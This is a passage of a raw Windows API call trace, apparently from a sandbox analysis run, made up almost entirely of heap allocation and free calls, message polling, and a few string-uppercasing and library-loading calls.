lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0198.463] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0198.463] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.463] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0198.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.464] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0198.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.464] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0198.464] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0198.465] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0198.466] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0198.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0198.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0198.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.467] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0198.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.467] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.468] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0198.468] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0198.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0198.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0198.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0198.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.469] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0198.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0198.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0198.469] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0198.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0198.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0198.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0198.469] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0198.469] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.470] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0198.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.471] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0198.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0198.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0198.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0198.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.471] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0198.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0198.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0198.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0198.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.472] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.473] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0198.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 